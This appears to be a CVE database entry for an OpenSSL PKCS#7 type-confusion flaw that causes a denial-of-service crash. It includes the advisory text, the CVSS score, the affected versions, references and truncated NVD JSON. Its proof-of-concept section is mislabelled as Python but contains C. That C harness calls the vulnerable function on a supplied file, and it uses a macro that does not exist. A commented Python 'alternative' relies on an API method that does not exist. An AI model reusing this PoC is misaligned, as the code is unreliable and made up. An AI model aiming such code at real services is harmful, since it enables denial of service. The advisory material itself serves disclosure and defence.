CVE-2026-22796

Description

Issue summary: A type confusion vulnerability exists in the signature verification of signed PKCS#7 data where an ASN1_TYPE union member is accessed without first validating the type, causing an invalid or NULL pointer dereference when processing malformed PKCS#7 data. Impact summary: An application performing signature verification of PKCS#7 data or calling directly the PKCS7_digest_from_attributes() function can be caused to dereference an invalid or NULL pointer when reading, resulting in a Denial of Service. The function PKCS7_digest_from_attributes() accesses the message digest attribute value without validating its type. When the type is not V_ASN1_OCTET_STRING, this results in accessing invalid memory through the ASN1_TYPE union, causing a crash. Exploiting this vulnerability requires an attacker to provide a malformed signed PKCS#7 to an application that verifies it. The impact of the exploit is just a Denial of Service, the PKCS7 API is legacy and applications should be using the CMS API instead. For these reasons the issue was assessed as Low severity. The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the PKCS#7 parsing implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* - VULNERABLE

OpenSSL 3.6.x

OpenSSL 3.5.x

OpenSSL 3.4.x

OpenSSL 3.3.x

OpenSSL 3.0.x

OpenSSL 1.1.1.x

OpenSSL 1.0.2.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * CVE-2026-22796 PoC - Malformed PKCS#7 Type Confusion
 * This PoC demonstrates the type confusion in PKCS7_digest_from_attributes()
 * Compile: gcc -o cve_poc cve_poc.c -lssl -lcrypto
 * Usage: ./cve_poc <malformed_pkcs7_file>
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/pem.h>
#include <openssl/pkcs7.h>
#include <openssl/err.h>

int main(int argc, char **argv) {
    FILE *fp;
    PKCS7 *p7 = NULL;
    PKCS7_SIGNER_INFO *si;
    STACK_OF(PKCS7_SIGNER_INFO) *sk_si;
    X509 *x;
    EVP_PKEY *pkey;
    int i;

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <malformed_pkcs7_file>\n", argv[0]);
        return 1;
    }

    /* Read malformed PKCS#7 data from file */
    fp = fopen(argv[1], "rb");
    if (!fp) {
        perror("Failed to open file");
        return 1;
    }

    /* Parse PKCS#7 structure */
    p7 = d2i_PKCS7_fp(fp, NULL);
    fclose(fp);

    if (!p7) {
        fprintf(stderr, "Failed to parse PKCS#7 data\n");
        ERR_print_errors_fp(stderr);
        return 1;
    }

    /* Get signer info - this triggers the vulnerable code path */
    sk_si = PKCS7_get_signer_info(p7);
    if (sk_si && sk_NUM(sk_si) > 0) {
        for (i = 0; i < sk_NUM(sk_si); i++) {
            si = sk_PKCS7_SIGNER_INFO_value(sk_si, i);
            /* 
             * This call triggers the vulnerability:
             * PKCS7_digest_from_attributes() accesses ASN1_TYPE
             * without validating the type first
             */
            PKCS7_digest_from_attributes(si->auth_attr);
        }
    }

    PKCS7_free(p7);
    printf("No crash detected - target may not be vulnerable\n");
    return 0;
}

/* Alternative Python PoC using cryptography library */
/*
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.serialization import pkcs7
import sys

def trigger_vulnerability():
    # Read malformed PKCS#7 data
    with open(sys.argv[1], 'rb') as f:
        malformed_data = f.read()
    
    # Attempt to parse - this may trigger the vulnerability
    try:
        p7 = pkcs7.PKCS7SignatureBuilder.from_der(malformed_data)
        # Access signer info which calls vulnerable function
        p7.sign(hashes.SHA256(), options=[])
    except Exception as e:
        print(f"Error: {e}")

if __name__ == '__main__':
    trigger_vulnerability()
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22796
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22796
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22796/
[4] VulDB https://vuldb.com/cve/CVE-2026-22796
[5] https://github.com/openssl/openssl/commit/2502e7b7d4c0cf4f972a881641fe09edc67aeec4
[6] https://github.com/openssl/openssl/commit/572844beca95068394c916626a6d3a490f831a49
[7] https://github.com/openssl/openssl/commit/7bbca05be55b129651d9df4bdb92becc45002c12
[8] https://github.com/openssl/openssl/commit/eeee3cbd4d682095ed431052f00403004596373e
[9] https://github.com/openssl/openssl/commit/ef2fb66ec571564d64d1c74a12e388a2a54d05d2
[10] https://openssl-library.org/news/secadv/20260127.txt
[11] https://cert-portal.siemens.com/productcert/html/ssa-265688.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22796", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:35.543", "lastModified": "2026-05-12T13:17:32.480", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: A type confusion vulnerability exists in the signature\nverification of signed PKCS#7 data where an ASN1_TYPE union member is\naccessed without first validating the type, causing an invalid or NULL\npointer dereference when processing malformed PKCS#7 data.\n\nImpact summary: An application performing signature verification of PKCS#7\ndata or calling directly the PKCS7_digest_from_attributes() function can be\ncaused to dereference an invalid or NULL pointer when reading, resulting in\na Denial of Service.\n\nThe function PKCS7_digest_from_attributes() accesses the message digest attribute\nvalue without validating its type. When the type is not V_ASN1_OCTET_STRING,\nthis results in accessing invalid memory through the ASN1_TYPE union, causing\na crash.\n\nExploiting this vulnerability requires an attacker to provide a malformed\nsigned PKCS#7 to an application that verifies it. The impact of the\nexploit is just a Denial of Service, the PKCS7 API is legacy and applications\nshould be using the CMS API instead. For these reasons the issue was\nassessed as Low severity.\n\nThe FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS#7 parsing implementation is outside the OpenSSL FIPS module\nboundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue."}, {"lang": "es", "value": "Resumen del problema: Existe una vulnerabilidad de confusión de tipos en la verificación de firma de datos PKCS#7 firmados, donde se accede a un miembro de la unión ASN1_TYPE sin validar primero el tipo, causando una desreferencia de puntero inválido o NULL al procesar datos PKCS#7 malformados.\n\nResumen del impacto: Una aplicación que realiza la verificación de firma de datos PKCS#7 o que llama directamente a la función PKCS7_digest_from_attributes() puede ser inducida a desreferenciar un puntero inválido o NULL al leer, resultando en una denegación de servicio.\n\nLa función PKCS7_digest_from_attributes() accede al valor del atributo de resumen del mensaje sin validar su tipo. Cuando el tipo no es V_ASN1_OCTET_STRING, esto resulta en el acceso a memoria inválida a través de la unión ASN1_TYPE, causando un fallo.\n\nExplotar esta vulnerabilidad requiere que un atacante proporcione un PKCS#7 firmado malformado a una aplicación que lo verifica. El impacto del exploit es solo una denegación de servicio, la API PKCS7 es heredada y las aplicaciones deberían usar la API CMS en su lugar. Por estas razones, el problema fue evaluado como de baja severidad.\n\nLos módulos FIPS en 3.5, 3.4, 3.3 y 3.0 no se ven afectados por este problema, ya que la implementación de análisis de PKCS#7 está fuera del límite del módulo FIPS de OpenSSL.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 y 1.0.2 son vulnerables a este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.2", "versionEndExcluding": "1.0.2zn", "matchCriteriaId": "6A8EC60C-05EC-4886-8C82-63AEF4BDA8D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.1", "versionEndExcluding": "1.1.1ze", "matchCriteriaId": "E000B986-6A31-468F-9EA3-B9D16DB16FB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.19", "matchCriteriaId": "C76C5F55-5243-4461-82F5-2FEBFF4D59FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "F5292E9E-6B50-409F-9219-7B0A04047AD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.4", "matchCriteriaId": "B9D3DCAE-317D-4DFB-93F0-7A235A229619"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.5", "matchCriteriaId": "1CAC7CBE-EC03-4089-938A-0C ... (truncated)